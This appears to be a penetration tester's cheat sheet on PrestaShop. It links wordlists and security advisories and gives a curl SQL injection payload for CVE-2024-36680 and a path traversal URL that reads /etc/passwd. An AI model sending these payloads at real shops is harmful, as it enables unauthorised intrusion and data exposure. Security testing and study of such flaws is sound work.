Prestashop

Enumeration

wordlists/technologies/prestashop-all-levels.txt at main · trickest/wordlistsGitHub

wordlists/technologies/prestashop.txt at main · trickest/wordlistsGitHub

Search for CVE - Friends-of-Presta

Friends-Of-Presta Security AdvisoriesFriends-Of-Presta Security Advisories

CVE-2024-36680 - SQLi

curl -v "https://preprod.X/modules/pkfacebook/ajax/facebookConnect.php?id=1";select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--&email=test@test.fr

[CVE-2024-36680] Improper neutralization of SQL parameter in Promokit.eu - Facebook module for PrestaShopFriends-Of-Presta Security Advisories

Path Traversal

Prestashop < 8.2.0

http://localhost/?controller=upload&file=../../../../../etc/passwd

Path Traversal Vulnerability in PrestaShop <8.2.0 – Critical Security – Security Todaywww.critical.lt

XSS

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)Exploit Database

SQLi

PrestaShop’s Customer Photo Gallery, version 2.9.3 and below.

https://www.getastra.com/blog/911/plugin-exploit/prestashops-customer-photo-gallery-module-vulnerable-to-sql-injection-attacks/?utm_source=chatgpt.comwww.getastra.com

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.